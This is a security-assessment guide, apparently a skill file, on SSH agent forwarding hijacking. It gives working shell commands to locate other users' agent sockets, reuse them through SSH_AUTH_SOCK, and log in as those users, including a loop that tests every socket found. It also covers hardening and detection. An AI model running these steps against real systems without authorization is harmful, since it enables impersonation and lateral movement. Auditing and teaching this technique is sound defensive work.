SSH Agent Forwarding Exploitation

A skill for identifying and understanding SSH agent forwarding vulnerabilities during security assessments.

What This Skill Does

This skill helps you:

• Identify SSH agent forwarding misconfigurations
• Locate exposed SSH agent sockets on a system
• Understand how agent hijacking works
• Audit SSH security configurations
• Test for privilege escalation via SSH agents

When to Use This Skill

Use this skill when:

• You discover

  ForwardAgent yes

  in SSH configurations
• You need to find SSH agent sockets on a compromised system
• You're auditing SSH security for potential agent forwarding risks
• You want to understand how SSH agent hijacking works
• You're performing privilege escalation testing

Finding SSH Agent Sockets

Quick Socket Hunt

Run these commands to find exposed SSH agent sockets:

# Check common locations
ls -la /run/user/*/ssh-* /tmp/ssh-* 2>/dev/null

# Find all agent sockets
find /run/user /tmp -type s -name 'agent.*' 2>/dev/null

# More comprehensive search
find / -type s -name 'agent.*' 2>/dev/null | grep -E '(ssh|agent)'

What You're Looking For

SSH agent sockets typically appear as:

• /tmp/ssh-XXXXXXXX/agent.PID

• /run/user/UID/ssh-XXXXXXXX/agent.PID

• Unix domain sockets (type

  s

  in

  ls -la

  output)

Understanding the Vulnerability

Why This Works

When

ForwardAgent yes

is set in SSH configuration:

1. The agent socket is forwarded to the remote system
2. SSH_AUTH_SOCK environment variable points to the forwarded socket
3. Private keys remain in memory of the agent, unencrypted
4. Any process with socket access can use the keys

The Risk

If you gain root access on a system with forwarded SSH agents:

• You can access any SSH connection made by users with agent forwarding
• You can impersonate users to other systems
• You can potentially extract private keys from agent memory
• This works even if the user doesn't know the key password (keys are in memory)

Exploitation Steps

Step 1: Check SSH Configuration

Look for agent forwarding in:

# System-wide config
grep -i "forwardagent" /etc/ssh/ssh_config

# User-specific config
grep -i "forwardagent" ~/.ssh/config

# Check all user configs
find /home -name "config" -path "*/.ssh/*" -exec grep -l "ForwardAgent yes" {} \;

Step 2: Find Agent Sockets

# List all potential agent sockets
find /run/user /tmp -type s -name 'agent.*' 2>/dev/null

# Check socket permissions
ls -la /tmp/ssh-*/agent.* 2>/dev/null
ls -la /run/user/*/ssh-*/agent.* 2>/dev/null

Step 3: Test Access

If you find an agent socket, test if you can use it:

# Set the environment variable
export SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816

# List available identities
ssh-add -l

# Try connecting as the user
ssh bob@boston

Step 4: Impersonate Users

To impersonate a user using their agent:

# Direct connection using their agent
SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816 ssh bob@boston

# Or set it in your shell
export SSH_AUTH_SOCK=/tmp/ssh-haqzR16816/agent.16816
ssh bob@boston

Security Recommendations

For System Administrators

1. Disable agent forwarding by default

   # In /etc/ssh/ssh_config
   ForwardAgent no
   

2. Use specific host configurations

   # Only enable for trusted hosts
   Host trusted-server
       ForwardAgent yes
   

3. Monitor agent sockets

   # Check for unexpected agent sockets
   find /tmp /run/user -type s -name 'agent.*' -ls
   

4. Use key-based authentication with restrictions

   # In authorized_keys
   from="trusted-host",command="/path/to/script" ssh-rsa ...
   

For Security Auditors

1. Check all user SSH configs for ForwardAgent settings
2. Look for agent sockets on compromised systems
3. Test agent access if you have elevated privileges
4. Document findings for remediation

Common Scenarios

Scenario 1: You're Root, User Has Forwarded Agent

# Find the user's agent socket
find /run/user /tmp -type s -name 'agent.*' 2>/dev/null

# Use it to connect as that user
SSH_AUTH_SOCK=/path/to/agent.socket ssh username@target

Scenario 2: Multiple Users, Multiple Agents

# List all agents with ownership
find /run/user /tmp -type s -name 'agent.*' -exec ls -la {} \; 2>/dev/null

# Try each one
for socket in $(find /run/user /tmp -type s -name 'agent.*' 2>/dev/null); do
    echo "Testing: $socket"
    SSH_AUTH_SOCK="$socket" ssh-add -l 2>/dev/null && echo "SUCCESS"
done

Scenario 3: Agent on Remote System

If you SSH to a remote system with agent forwarding:

# Check if your agent is forwarded
env | grep SSH_AUTH_SOCK

# See what's in the agent
ssh-add -l

# This is a risk - anyone with access can use your keys!

Detection and Prevention

Detect Active Agent Forwarding

# Check current session
env | grep SSH_AUTH_SOCK

# Check SSH config
grep -r "ForwardAgent" ~/.ssh/ /etc/ssh/ 2>/dev/null

# Check running SSH processes
ps aux | grep ssh | grep -v grep

Prevent Agent Hijacking

1. Don't use ForwardAgent unless absolutely necessary
2. Use sshuttle or similar for network-level forwarding instead
3. Set socket permissions carefully
4. Use jump hosts with proper configuration
5. Monitor for unauthorized agent access

References

• Original Research: SSH Agent Hijacking
• SSH Configuration Manual
• SSH Agent Manual

Important Notes

• This skill is for security auditing and educational purposes only
• Always have proper authorization before testing SSH agent vulnerabilities
• Agent forwarding is convenient but risky - understand the tradeoffs
• Keys in agent memory are unencrypted - this is the core vulnerability
• Root access + agent forwarding = potential lateral movement

Quick Reference

# Find agent sockets
find /run/user /tmp -type s -name 'agent.*' 2>/dev/null

# Check SSH config for ForwardAgent
grep -r "ForwardAgent" ~/.ssh/ /etc/ssh/ 2>/dev/null

# Test agent access
SSH_AUTH_SOCK=/path/to/socket ssh-add -l

# Use agent to connect
SSH_AUTH_SOCK=/path/to/socket ssh user@host

---

Remember: SSH agent forwarding is a powerful feature that can be exploited. Use this skill to understand the risks and secure your systems accordingly.